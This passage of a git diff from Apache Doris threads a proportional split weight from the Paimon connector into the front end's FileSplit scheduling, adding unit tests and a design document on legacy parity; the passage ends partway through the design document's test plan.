+780,8 @@ static boolean isCountPushdownSplit(boolean countPushdown, DataSplit dataSplit) * reading data. The serialization format honors the cpp-reader flag, like {@link #buildJniScanRange}. */ private PaimonScanRange buildCountRange(DataSplit dataSplit, String tableLocation, - String defaultFileFormat, Map partitionValues, boolean cppReader, long rowCount) { + String defaultFileFormat, Map partitionValues, boolean cppReader, long rowCount, + long weightDenominator) { String serializedSplit = encodeSplit(dataSplit, cppReader); // FIX-JNI-FILE-FORMAT (P7-1): real data-file format, not "jni" (see buildJniScanRange). return new PaimonScanRange.Builder() @@ -776,6 +790,7 @@ private PaimonScanRange buildCountRange(DataSplit dataSplit, String tableLocatio .tableLocation(tableLocation) .partitionValues(partitionValues) .selfSplitWeight(computeSplitWeight(dataSplit)) + .targetSplitSize(weightDenominator) .rowCount(rowCount) .build(); } @@ -862,6 +877,22 @@ private long resolveTargetSplitSize(ConnectorSession session, List da totalNativeFileSize); } + /** + * The proportional-weight denominator (FIX-A1) = legacy scan-level {@code targetSplitSize} + * ({@code PaimonScanNode:497-500}): {@code file_split_size} when set ({@code > 0}), else + * {@code max_file_split_size} (default 64 MB). Exact parity with legacy + * {@code getFileSplitSize() > 0 ? getFileSplitSize() : getMaxSplitSize()}. This is DISTINCT from + * {@link #resolveTargetSplitSize} (the native file-splitting granularity); it is the divisor for the FE + * {@code FileSplit} proportional split weight and is applied to EVERY split type (native / JNI / count), + * even under COUNT(*) pushdown where the file-splitting size is 0. + */ + static long resolveSplitWeightDenominator(ConnectorSession session) { + long fileSplitSize = sessionLong(session, FILE_SPLIT_SIZE, 0L); + return fileSplitSize > 0 + ? fileSplitSize + : sessionLong(session, MAX_FILE_SPLIT_SIZE, DEFAULT_MAX_FILE_SPLIT_SIZE); + } + /** * Reads a long session var from the SPI session properties (VariableMgr.toMap channel), falling * back to {@code defaultValue} when absent/blank/unparseable. Mirrors the null-tolerant diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java index 4e48e2baa07f85..9b6c9e333d7eee 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java @@ -59,6 +59,10 @@ public class PaimonScanRange implements ConnectorScanRange { private final Map partitionValues; private final Map properties; private final long selfSplitWeight; + // FIX-A1: weight denominator (legacy scan-level targetSplitSize, PaimonScanNode:499) for the FE + // FileSplit proportional weight. -1 = not provided (SPI sentinel). Separate from the file-splitting + // granularity used to slice native files. + private final long targetSplitSize; private PaimonScanRange(Builder builder) { this.path = builder.path; @@ -67,6 +71,7 @@ private PaimonScanRange(Builder builder) { this.fileSize = builder.fileSize; this.fileFormat = builder.fileFormat; this.selfSplitWeight = builder.selfSplitWeight; + this.targetSplitSize = builder.targetSplitSize; this.partitionValues = builder.partitionValues != null ? Collections.unmodifiableMap(builder.partitionValues) : Collections.emptyMap(); @@ -173,10 +178,16 @@ public boolean isNativeReadRange() { return !properties.containsKey("paimon.split") && path != null; } + @Override public long getSelfSplitWeight() { return selfSplitWeight; } + @Override + public long getTargetSplitSize() { + return targetSplitSize; + } + @Override public String toString() { return "PaimonScanRange{path=" + path + ", format=" + fileFormat @@ -281,6 +292,9 @@ public static class Builder { private String fileFormat = ""; private Map partitionValues; private long selfSplitWeight; + // -1 = not provided (SPI sentinel). NOT 0: a 0 denominator is invalid (would divide-by-zero), unlike + // selfSplitWeight whose 0 is a legitimate empty-file / 0-row weight. + private long targetSplitSize = -1; // JNI reader fields private String paimonSplit; @@ -330,6 +344,11 @@ public Builder selfSplitWeight(long selfSplitWeight) { return this; } + public Builder targetSplitSize(long targetSplitSize) { + this.targetSplitSize = targetSplitSize; + return this; + } + public Builder paimonSplit(String paimonSplit) { this.paimonSplit = paimonSplit; return this; diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index 5ba747182cd6a3..cca733678b6787 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -275,7 +275,7 @@ public void nativeRangeNormalizesBothDataAndDeletionVectorPaths() { "oss://bkt/warehouse/db/t/index/dv-0.index", 8L, 16L, 4L); PaimonScanRange range = provider.buildNativeRange( - file, dv, "parquet", Collections.emptyMap(), Collections.emptyMap(), 0L, 100L); + file, dv, "parquet", Collections.emptyMap(), Collections.emptyMap(), 0L, 100L, 64L * 1024 * 1024); // WHY: BE's scheme-dispatched S3 file factory only opens canonical s3://. An un-normalized // oss:// DATA-file path fails the native ORC/Parquet read outright; an un-normalized oss:// DV @@ -300,7 +300,7 @@ public void nativeRangeWithoutDeletionVectorNormalizesOnlyDataPath() { PaimonScanRange range = provider.buildNativeRange( parquetRawFile("oss://bkt/a/part-0.parquet"), null, "parquet", - Collections.emptyMap(), Collections.emptyMap(), 0L, 100L); + Collections.emptyMap(), Collections.emptyMap(), 0L, 100L, 64L * 1024 * 1024); // WHY: a DV-less native split must still normalize its data-file path and must NOT emit a DV // descriptor. MUTATION: emitting a deletion_file for a null DV, or skipping data normalization -> red. @@ -320,7 +320,7 @@ public void nativeRangeWithoutContextPreservesRawPath() { PaimonScanRange range = provider.buildNativeRange( parquetRawFile("oss://bkt/a/part-0.parquet"), null, "parquet", - Collections.emptyMap(), Collections.emptyMap(), 0L, 100L); + Collections.emptyMap(), Collections.emptyMap(), 0L, 100L, 64L * 1024 * 1024); // MUTATION: NPE on null context, or fabricating a normalized path from nothing -> red. Assertions.assertEquals("oss://bkt/a/part-0.parquet", range.getPath().orElse(null)); @@ -345,7 +345,7 @@ public void buildNativeRangeThreadsVendedTokenToBothPaths() { "oss://bkt/warehouse/db/t/index/dv-0.index", 8L, 16L, 4L); PaimonScanRange range = provider.buildNativeRange( - file, dv, "parquet", Collections.emptyMap(), vendedToken, 0L, 100L); + file, dv, "parquet", Collections.emptyMap(), vendedToken, 0L, 100L, 64L * 1024 * 1024); // WHY: the engine seam normalizes against the VENDED map (the REST static map is empty). If the // connector dropped the token (reverting to the 1-arg seam) or substituted an empty map, a REST @@ -1084,7 +1084,7 @@ public void buildNativeRangesAttachesSameDeletionVectorToEverySubRange() { long target = Math.max(1L, file.length() / 3); // force the file to sub-split into >=2 ranges List ranges = provider.buildNativeRanges( - file, dv, "parquet", Collections.emptyMap(), Collections.emptyMap(), target); + file, dv, "parquet", Collections.emptyMap(), Collections.emptyMap(), target, 64L * 1024 * 1024); // WHY: the load-bearing correctness claim of FIX-NATIVE-SUBSPLIT — a paimon deletion vector is a // bitmap of GLOBAL file row positions, so EVERY sub-range of a DV-bearing file must carry the @@ -1112,7 +1112,7 @@ public void buildNativeRangesKeepsFileWholeWhenTargetNonPositive() { RawFile file = parquetRawFile("oss://bkt/a/part-0.parquet"); List ranges = provider.buildNativeRanges( - file, null, "parquet", Collections.emptyMap(), Collections.emptyMap(), 0L); + file, null, "parquet", Collections.emptyMap(), Collections.emptyMap(), 0L, 64L * 1024 * 1024); Assertions.assertEquals(1, ranges.size(), "a non-positive target (COUNT(*) pushdown) must keep the file as one whole-file range"); @@ -1819,4 +1819,110 @@ public void getScanNodePropertiesSkipsSchemaEvolutionForNonFileStoreTable() { Assertions.assertFalse(scanProps.containsKey("paimon.schema_evolution"), "non-DataTable (JNI path) must not emit the native schema dictionary"); } + + // ==================== FIX-A1: split weight (FE BE-assignment proportional weight) ==================== + + @Test + public void scanRangeBuilderDefaultsTargetSplitSizeToSentinel() { + // A range built WITHOUT a denominator reports the -1 SPI sentinel (so PluginDrivenSplit keeps + // standard()); selfSplitWeight defaults to a real 0 (a valid empty-file/sys weight). A range WITH + // both round-trips them. MUTATION: defaulting targetSplitSize to 0 -> a 0 denominator -> red. + PaimonScanRange noWeight = new PaimonScanRange.Builder().build(); + Assertions.assertEquals(-1L, noWeight.getTargetSplitSize(), + "targetSplitSize default must be the -1 sentinel, not 0 (0 is an invalid denominator)"); + + PaimonScanRange weighted = new PaimonScanRange.Builder() + .selfSplitWeight(7L).targetSplitSize(99L).build(); + Assertions.assertEquals(7L, weighted.getSelfSplitWeight()); + Assertions.assertEquals(99L, weighted.getTargetSplitSize()); + } + + @Test + public void buildNativeRangeSetsProportionalWeightFromLengthAndDv() { + // Legacy PaimonSplit(LocationPath,...).selfSplitWeight = sub-range length, += deletionFile.length() + // when a DV is attached (PaimonSplit:72,112). The native FE weight reproduces that and carries the + // scan-level denominator. MUTATION: dropping the native .selfSplitWeight(...) -> weight 0 -> red. + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + new HashMap<>(), new RecordingPaimonCatalogOps()); + RawFile file = parquetRawFile("/data/part-0.parquet"); + DeletionFile dv = new DeletionFile("/data/dv-0.index", 8L, 16L, 4L); + + PaimonScanRange withDv = provider.buildNativeRange( + file, dv, "parquet", Collections.emptyMap(), Collections.emptyMap(), 0L, 64L, 64 * MB); + Assertions.assertEquals(64L + dv.length(), withDv.getSelfSplitWeight(), + "native weight = sub-range length + the deletion-vector length"); + Assertions.assertEquals(64 * MB, withDv.getTargetSplitSize(), + "native range must carry the weight denominator"); + + PaimonScanRange noDv = provider.buildNativeRange( + file, null, "parquet", Collections.emptyMap(), Collections.emptyMap(), 0L, 70L, 64 * MB); + Assertions.assertEquals(70L, noDv.getSelfSplitWeight(), + "a DV-less native range weight is just the sub-range length"); + } + + @Test + public void buildNativeRangesThreadsDenominatorDistinctFromFileSplitTarget() { + // Positional-swap guard: the file-split target and the weight denominator are two adjacent long + // params. Splitting must follow the FILE-SPLIT target while every sub-range carries the DENOMINATOR. + // MUTATION: swapping the two args -> wrong split count AND wrong targetSplitSize -> red. + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + new HashMap<>(), new RecordingPaimonCatalogOps()); + RawFile file = parquetRawFile("/data/part-0.parquet"); // length 100 + long fileSplitTarget = Math.max(1L, file.length() / 3); // 33 -> >=2 sub-ranges + long denominator = 64 * MB; // numerically distinct from 33 + + List ranges = provider.buildNativeRanges( + file, null, "parquet", Collections.emptyMap(), Collections.emptyMap(), + fileSplitTarget, denominator); + + Assertions.assertEquals( + PaimonScanPlanProvider.computeFileSplitOffsets(file.length(), fileSplitTarget).size(), + ranges.size(), + "sub-splitting must follow the file-split target, not the denominator"); + Assertions.assertTrue(ranges.size() >= 2, "fixture must sub-split into >=2 ranges"); + for (PaimonScanRange r : ranges) { + Assertions.assertEquals(denominator, r.getTargetSplitSize(), + "every native sub-range must carry the weight denominator"); + } + } + + @Test + public void buildNativeRangesCarriesDenominatorEvenWhenFileSplitSizeZero() { + // Under COUNT(*) pushdown the file-split size is 0 (whole-file range), but the denominator is + // computed independently, so the single range still gets a positive denominator (non-standard + // weight) and the whole-file length as its weight. + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + new HashMap<>(), new RecordingPaimonCatalogOps()); + RawFile file = parquetRawFile("/data/part-0.parquet"); + + List ranges = provider.buildNativeRanges( + file, null, "parquet", Collections.emptyMap(), Collections.emptyMap(), 0L, 64 * MB); + + Assertions.assertEquals(1, ranges.size(), "a non-positive target keeps the file whole"); + Assertions.assertEquals(64 * MB, ranges.get(0).getTargetSplitSize(), + "a whole-file (count-pushdown) range still carries the weight denominator"); + Assertions.assertEquals(file.length(), ranges.get(0).getSelfSplitWeight(), + "the whole-file range weight is the full file length"); + } + + @Test + public void resolveSplitWeightDenominatorMatchesLegacyFormula() { + // Legacy getFileSplitSize()>0 ? getFileSplitSize() : getMaxSplitSize() (PaimonScanNode:499); + // getMaxSplitSize() = max_file_split_size, default 64MB. + Map withSplitSize = new HashMap<>(); + withSplitSize.put("file_split_size", "1234"); + Assertions.assertEquals(1234L, + PaimonScanPlanProvider.resolveSplitWeightDenominator(sessionWithProps(withSplitSize)), + "file_split_size>0 is used as the denominator"); + + Assertions.assertEquals(64 * MB, + PaimonScanPlanProvider.resolveSplitWeightDenominator(sessionWithProps(Collections.emptyMap())), + "unset file_split_size falls back to max_file_split_size (64MB default)"); + + Map withMax = new HashMap<>(); + withMax.put("max_file_split_size", "777"); + Assertions.assertEquals(777L, + PaimonScanPlanProvider.resolveSplitWeightDenominator(sessionWithProps(withMax)), + "unset file_split_size uses the configured max_file_split_size"); + } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSplit.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSplit.java index 87fd3bfc00f40f..a04fa5c315984e 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSplit.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSplit.java @@ -45,6 +45,17 @@ public PluginDrivenSplit(ConnectorScanRange scanRange) { scanRange.getHosts().toArray(new String[0]), buildPartitionValues(scanRange)); this.connectorScanRange = scanRange; + // FIX-A1: thread the connector's proportional split weight into the FileSplit scheduling fields so + // FederationBackendPolicy distributes by size (legacy parity) instead of uniform standard() weight. + // Set ONLY when the connector provides BOTH a weight (>= 0; 0 is a real weight) and a positive + // denominator (guards FileSplit.getSplitWeight's division). Connectors that supply neither keep the + // -1 SPI default -> both fields stay null -> getSplitWeight() == SplitWeight.standard() (no change). + long weight = scanRange.getSelfSplitWeight(); + long targetSize = scanRange.getTargetSplitSize(); + if (weight >= 0 && targetSize > 0) { + this.selfSplitWeight = weight; + this.targetSplitSize = targetSize; + } } /** Returns the underlying connector scan range for format-specific param extraction. */ diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenSplitWeightTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenSplitWeightTest.java new file mode 100644 index 00000000000000..76704056c0b2a3 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenSplitWeightTest.java @@ -0,0 +1,117 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.connector.api.scan.ConnectorScanRange; +import org.apache.doris.connector.api.scan.ConnectorScanRangeType; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.Map; + +/** + * FIX-A1: {@link PluginDrivenSplit} must thread the connector's proportional split weight + * ({@link ConnectorScanRange#getSelfSplitWeight()} / {@link ConnectorScanRange#getTargetSplitSize()}) into + * the {@link FileSplit} scheduling fields so {@code FederationBackendPolicy} distributes splits by size + * (legacy paimon parity), and must fall back to the uniform {@link SplitWeight#standard()} when the + * connector provides no weight (the {@code -1} SPI sentinel — no-regression for other connectors). + * + *

    Assertions pin the EXACT {@code getRawValue()} so the RED state (fields unset → standard, rawValue + * 100) is always distinguishable from the GREEN proportional value (50 / 1). {@code fromProportion} uses + * {@code ceil(weight * 100)} (SplitWeight:74), and FileSplit clamps the proportion to [0.01, 1.0] + * (FileSplit:106-112). + */ +public class PluginDrivenSplitWeightTest { + + /** Minimal fake range exposing only the two weight getters (+ the two required methods). */ + private static ConnectorScanRange range(long selfWeight, long targetSize) { + return new ConnectorScanRange() { + @Override + public ConnectorScanRangeType getRangeType() { + return ConnectorScanRangeType.FILE_SCAN; + } + + @Override + public Map getProperties() { + return Collections.emptyMap(); + } + + @Override + public long getSelfSplitWeight() { + return selfWeight; + } + + @Override + public long getTargetSplitSize() { + return targetSize; + } + }; + } + + @Test + public void proportionalWeightWhenConnectorProvidesBoth() { + // W=50 / T=100 -> proportion 0.5 -> fromProportion rawValue = ceil(50) = 50 (NOT standard's 100). + // WHY: legacy paimon set selfSplitWeight + targetSplitSize so FederationBackendPolicy weighted + // splits by size; the SPI must reproduce that. MUTATION: the ctor not threading the fields -> + // getSplitWeight() == standard() (rawValue 100) -> red. + PluginDrivenSplit split = new PluginDrivenSplit(range(50L, 100L)); + Assertions.assertEquals(50L, split.getSplitWeight().getRawValue(), + "a weighted range must yield a proportional (non-standard) split weight"); + } + + @Test + public void proportionalWeightClampsToLowerBound() { + // W=1 / T=100 -> 0.01 floor clamp -> fromProportion(0.01) rawValue = ceil(1) = 1 (NOT 0, NOT 100). + PluginDrivenSplit split = new PluginDrivenSplit(range(1L, 100L)); + Assertions.assertEquals(1L, split.getSplitWeight().getRawValue(), + "a tiny weight must clamp to the 0.01 lower bound (rawValue 1), not collapse to 0"); + } + + @Test + public void zeroWeightIsValidAndProportional() { + // W=0 (empty file / 0-row sys table) is a legitimate weight, not "unset": 0/100 -> clamp 0.01 -> + // rawValue 1. The gate is weight>=0 (NOT >0), so a genuine 0 still produces a clamped proportional + // weight. MUTATION: a weight>0 gate would drop 0-weight splits back to standard() (rawValue 100). + PluginDrivenSplit split = new PluginDrivenSplit(range(0L, 100L)); + Assertions.assertEquals(1L, split.getSplitWeight().getRawValue(), + "weight 0 is valid (>=0 gate) and clamps to 0.01, matching legacy"); + } + + @Test + public void standardWeightWhenConnectorProvidesNoWeight() { + // The -1 SPI sentinel (a connector with no weight model: jdbc/es/trino/maxcompute) -> both FileSplit + // fields stay null -> standard() (rawValue 100). The no-regression guarantee. + PluginDrivenSplit split = new PluginDrivenSplit(range(-1L, -1L)); + Assertions.assertEquals(100L, split.getSplitWeight().getRawValue(), + "no connector weight (-1 sentinel) must keep the uniform standard() weight"); + Assertions.assertSame(SplitWeight.standard(), split.getSplitWeight()); + } + + @Test + public void standardWeightWhenOnlyOneFieldProvided() { + // Proportional weight needs BOTH a weight and a POSITIVE denominator (target>0 guards div-by-zero). + Assertions.assertEquals(100L, + new PluginDrivenSplit(range(50L, -1L)).getSplitWeight().getRawValue(), + "a weight with no target denominator must stay standard()"); + Assertions.assertEquals(100L, + new PluginDrivenSplit(range(-1L, 100L)).getSplitWeight().getRawValue(), + "a target with no weight must stay standard()"); + } +} diff --git a/plan-doc/designs/FIX-A1-SPLIT-WEIGHT-design.md b/plan-doc/designs/FIX-A1-SPLIT-WEIGHT-design.md new file mode 100644 index 00000000000000..5d3f0c8d80dae4 --- /dev/null +++ b/plan-doc/designs/FIX-A1-SPLIT-WEIGHT-design.md @@ -0,0 +1,175 @@ +# FIX-A1 — thread proportional split weight to the FE FileSplit (BE-assignment parity) + +> Source: `task-list-P6-deviation-fixes.md` §A1 + `reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md` §R1 (scan). +> Single-task loop: design → design red-team → implement → impl-verify → build+UT → commit. +> MINOR / regression. FE BE-assignment only — **no rows / route / BE-read / result change.** + +## Problem + +`PluginDrivenSplit`'s ctor (`PluginDrivenSplit.java:39-48`) forwards path/start/length/fileSize/modTime/ +hosts/partitionValues to `FileSplit` but **never sets `selfSplitWeight` / `targetSplitSize`**. So +`FileSplit.getSplitWeight()` (`FileSplit.java:104-113`) hits the `else` branch → `SplitWeight.standard()` +(uniform) for every plugin-driven split. Legacy paimon set both fields, so `FederationBackendPolicy` +distributed splits across BEs by **proportional** weight (bigger split = more weight). Under the SPI all +paimon splits get uniform weight → the BE assignment differs from legacy (a scheduling skew, no +correctness impact). + +## Root cause & the legacy parity spec (verified against real code) + +`FileSplit.getSplitWeight()` returns proportional weight **iff** `selfSplitWeight != null && targetSplitSize +!= null`, computing `fromProportion(clamp(selfSplitWeight / targetSplitSize, 0.01, 1.0))`. The SPI never +populates either field. The legacy values (which we must reproduce): + +**Per-split `selfSplitWeight`** (`PaimonSplit.java`): +- JNI / count split (`PaimonSplit(Split)` :50-64): `DataSplit` → `Σ dataFiles.fileSize` (:60); + non-`DataSplit` system table → `rowCount()` (:63). +- Native sub-split (`PaimonSplit(LocationPath,start,length,…)` :67-72, built by `FileSplitter.splitFile` + + `PaimonSplitCreator`): `selfSplitWeight = length` (the sub-range byte length, :72), **plus** + `+= deletionFile.length()` when a DV is attached (`setDeletionFile` :112). + +**Scan-level `targetSplitSize`** (the weight denominator, `PaimonScanNode.java:497-500`): set on **all** +splits to `getFileSplitSize() > 0 ? getFileSplitSize() : getMaxSplitSize()`, where `getMaxSplitSize()` = +the `max_file_split_size` var (default 64 MB, `SessionVariable:2408,4729`). This is a **different** value +from the file-splitting granularity `determineTargetFileSplitSize` (the connector's +`resolveTargetSplitSize`), and overrides whatever `FileSplitCreator` set. + +**What the connector computes today vs needs:** +| split type | connector `selfSplitWeight` today | legacy | gap | +|---|---|---|---| +| JNI (`buildJniScanRange`) | `computeSplitWeight` = Σ fileSize / rowCount (:728-733,747) | same | none | +| count (`buildCountRange`) | `computeSplitWeight` (:778) | Σ fileSize | none | +| **native (`buildNativeRange`)** | **unset → Builder default 0** (:472-489) | `length` (+DV) | **MISSING** | +| `targetSplitSize` (all) | **never carried** | `fileSplitSize>0 ? : maxFileSplitSize` | **MISSING** | + +So the task-list's "already computed, just not threaded" holds only for JNI/count. **Native is the common +path** (default ORC/Parquet read); leaving its `selfSplitWeight = 0` would make every native split's weight +`clamp(0/denom)=0.01` (uniform-ish), so wiring the getters WITHOUT fixing native would not achieve +proportional distribution. Both the native weight and the denominator must be added. + +## Design + +**Generic SPI getters + connector populates them + fe-core wires them.** Connector-agnostic: other +connectors (jdbc/es/trino/maxcompute) inherit the sentinel default → keep `SplitWeight.standard()` (no +regression). + +1. **SPI `ConnectorScanRange`** (fe-connector-api) — two new default methods, sentinel `-1` = "no weight": + ```java + /** Per-split weight numerator for proportional BE assignment, or -1 if the connector + * does not provide one (→ the engine falls back to SplitWeight.standard()). */ + default long getSelfSplitWeight() { return -1; } + /** Weight denominator (scan-level target split size), or -1 if not provided. Proportional + * weight is applied only when BOTH this and getSelfSplitWeight() are present. */ + default long getTargetSplitSize() { return -1; } + ``` + A connector with no weight model returns both `-1` → unchanged behavior. + +2. **`PluginDrivenSplit` ctor** (fe-core) — after `super(...)`, set the FileSplit fields only when the + connector provides BOTH (guards div-by-zero and the null branch): + ```java + long weight = scanRange.getSelfSplitWeight(); + long target = scanRange.getTargetSplitSize(); + if (weight >= 0 && target > 0) { // weight may legitimately be 0 (empty file / sys table) + this.selfSplitWeight = weight; + this.targetSplitSize = target; + } + ``` + Generic — no source-specific branching (rule: keep `PluginDrivenScanNode`/generic node connector-agnostic). + +3. **`PaimonScanRange`** (connector) — carry the denominator and expose both getters: + - Add `targetSplitSize` field + `Builder.targetSplitSize(long)` + `@Override getTargetSplitSize()`. + **Builder default = `-1`** (the SPI sentinel "not provided"), NOT primitive `0` — a `0` denominator is + invalid (div-by-zero / would be gated out). This is deliberately asymmetric with `selfSplitWeight` + (default `0`, since `0` is a legitimate empty-file / 0-row-sys-table weight, which the `weight >= 0` + gate accepts). Production always sets `targetSplitSize`; the `-1` default just keeps a Builder that + omits it honest to the SPI contract. + - `getSelfSplitWeight()` already returns the field; mark it `@Override` (it had no SPI declaration to + satisfy before — verified it has no current callers besides being the field's accessor, so `@Override` + is behavior-neutral). The `selfSplitWeight` field is the FE weight; the BE-thrift + `paimon.self_split_weight` prop stays gated on `paimonSplit != null` (A3) so native ranges still do not + emit it to BE — setting the field for native ranges changes only the FE getter. + +4. **`PaimonScanPlanProvider`** (connector) — compute the denominator once and thread it: + - New `resolveSplitWeightDenominator(session)` = `fileSplitSize>0 ? fileSplitSize : + sessionLong(MAX_FILE_SPLIT_SIZE, DEFAULT_MAX_FILE_SPLIT_SIZE)` — exact legacy `getFileSplitSize()>0 ? : + getMaxSplitSize()` parity (both read `file_split_size` / `max_file_split_size`; defaults 0 / 64 MB + match). Computed once in `planScanInternal` (session-only), passed to every builder. + - The threaded param + local is named **`weightDenominator`** EVERYWHERE (never `targetSplitSize`) so it + cannot transpose with the existing file-splitting `targetSplitSize` / `effectiveSplitSize` local — a + two-adjacent-`long` positional-swap is the one real bug risk here, name-isolated by construction. + - `buildNativeRange`: `.selfSplitWeight(length + (deletionFile != null ? deletionFile.length() : 0))` + (legacy `selfSplitWeight = length` + `+= deletionFile.length()`), `.targetSplitSize(weightDenominator)`. + - `buildJniScanRange` / `buildCountRange`: add `.targetSplitSize(weightDenominator)` (selfSplitWeight already set). + - Thread `weightDenominator` as an explicit param through `buildNativeRanges`/`buildNativeRange`/ + `buildJniScanRange`/`buildCountRange`. It is the weight base, computed even under count pushdown where + the file-splitting size (`effectiveSplitSize`) is 0. + - **Existing test call-sites of the changed signatures MUST be updated** (else compile break): + `PaimonScanPlanProviderTest` calls `buildNativeRange` (~4 sites) and `buildNativeRanges` (~2 sites) + directly — append the `weightDenominator` arg (any value, e.g. `64L*1024*1024`; those tests assert only + URI-normalization / DV-on-every-sub-range, both denom-independent). Confirm exact line numbers at impl. + + **Why Option A (connector-owned SPI `getTargetSplitSize`) over Option B (fe-core computes the denominator):** + hive/iceberg use a DIFFERENT denominator — the file-splitting granularity set by `FileSplitCreator` + (`FileSplit.java:94`) — not paimon's `getFileSplitSize()>0 ? : getMaxSplitSize()`. A single fe-core + denominator would mis-weight other connectors. The connector owning its denominator is both simpler and + correct; do NOT later "simplify" the SPI getter away. + +## No-regression / correctness + +- **Other connectors unchanged:** sentinel `-1` default → `PluginDrivenSplit` leaves both FileSplit fields + null → `getSplitWeight()` = `standard()` exactly as today. Verified **all 6 non-paimon + `ConnectorScanRange` impls (jdbc / es / trino / maxcompute / hive / hudi)** do not reference/override the + new getters → inherit the `-1` sentinel → `standard()`. (Hive's own `getTargetSplitSize` is a private + plan-provider method, not an SPI override — no collision.) +- **Paimon = legacy parity:** JNI/count `selfSplitWeight` already matches; native now matches (`length`+DV); + denominator matches legacy line 499 exactly. So `getSplitWeight()` reproduces legacy `fromProportion`. +- **weight 0 is valid** (empty file / 0-row sys table): the gate is `weight >= 0` (not `> 0`), so a genuine + 0 still yields `clamp(0/denom)=0.01`, matching legacy (whose denominator path is identical). Distinct + from A3, which fixed the same 0-vs-unset confusion on the BE-thrift channel. +- **No BE/route/result change:** the FileSplit weight feeds only `FederationBackendPolicy` (FE split→BE + assignment). `targetSplitSize > 0` guards div-by-zero; `denominator` defaults to 64 MB. + +## Files + +- `fe/fe-connector/fe-connector-api/.../scan/ConnectorScanRange.java` (2 default getters) +- `fe/fe-core/.../datasource/PluginDrivenSplit.java` (ctor gate) +- `fe/fe-connector/fe-connector-paimon/.../PaimonScanRange.java` (targetSplitSize field/Builder/getter, @Override) +- `fe/fe-connector/fe-connector-paimon/.../PaimonScanPlanProvider.java` (denominator helper + thread + native weight) +- `fe/fe-connector/fe-connector-paimon/.../test/.../PaimonScanPlanProviderTest.java` (update ~6 changed-signature call-sites + new tests) +- new/extended UT in fe-core (PluginDrivenSplit) + fe-connector-api (SPI defaults) + connector (PaimonScanRange) + +## Test Plan (RED→GREEN, each pinned by a mutation) + +### Unit tests (each pins a concrete, non-vacuous expected value) +1. **`PluginDrivenSplit` (fe-core, the core regression):** build a `PluginDrivenSplit` from a fake + `ConnectorScanRange` and assert the EXACT `getSplitWeight().getRawValue()` so RED (standard, rawValue 100) + is always distinguishable from GREEN — pin concrete values that do NOT collapse to standard: + - mid: `W=50, T=100` → proportion 0.5 → assert `rawValue == 50` (NOT standard's 100). + - clamp-low: `W=1, T=100` → 0.01 floor → assert `rawValue == 1`. + - default: a fake returning `-1/-1` → assert `getSplitWeight()` is `standard()` (rawValue 100). + (Avoid `W>=T` cases — they clamp to 1.0 == standard and would false-pass even in the RED state.) + A fake `ConnectorScanRange` is trivial — the same minimal anonymous impl exists in + `PluginDrivenScanNodeExplainStatsTest` (only `getRangeType` + `getProperties` need a body). **RED before:** + ctor sets neither field → every case returns `standard()` (rawValue 100) → the `==50`/`==1` asserts fail. +2. **SPI default (fe-connector-api):** an anonymous `ConnectorScanRange` (no override) returns `-1` for both + getters. Guards the no-regression default. +3. **`PaimonScanRange` sentinel + round-trip (connector):** (i) a Builder WITHOUT `.targetSplitSize()` → + `getTargetSplitSize() == -1` (pins the sentinel default + SPI contract); (ii) a Builder WITH + `.selfSplitWeight(W).targetSplitSize(T)` → both getters round-trip `W`/`T`. +4. **`buildNativeRange` weight (connector):** call `buildNativeRange(file, dv, …, start, length, + weightDenominator)` → range `getSelfSplitWeight() == length (+ dv.length())` and `getTargetSplitSize() == + weightDenominator`. Constructible fully offline — `buildNativeRange` is package-private and existing + tests already build `new RawFile(...)` / `new DeletionFile(...)` (no `FileSystemCatalog`). **MUTATION:** + drop the native `.selfSplitWeight(...)` → weight 0 → RED. +5. **`buildNativeRanges` positional-swap guard (connector):** call `buildNativeRanges` with a file-split + target (e.g. `33`) numerically DISTINCT from the `weightDenominator` (e.g. `64MB`) on a multi-sub-range + file → assert (a) range COUNT == `computeFileSplitOffsets(fileLength, 33).size()` (splitting follows the + file-split target) AND (b) every range `getTargetSplitSize() == 64MB` (the denominator). REDs on a swap + of the two adjacent `long` args. +6. **`resolveSplitWeightDenominator` + count-pushdown (connector):** `file_split_size` set → returns it; + unset → returns `max_file_split_size` (default 64 MB). Plus: a count-pushdown native range (file-split + `effectiveSplitSize == 0`) still gets a POSITIVE `weightDenominator` → non-standard weight (guards the + denominator being computed independently of the file-split size). + +### E2E +Gated 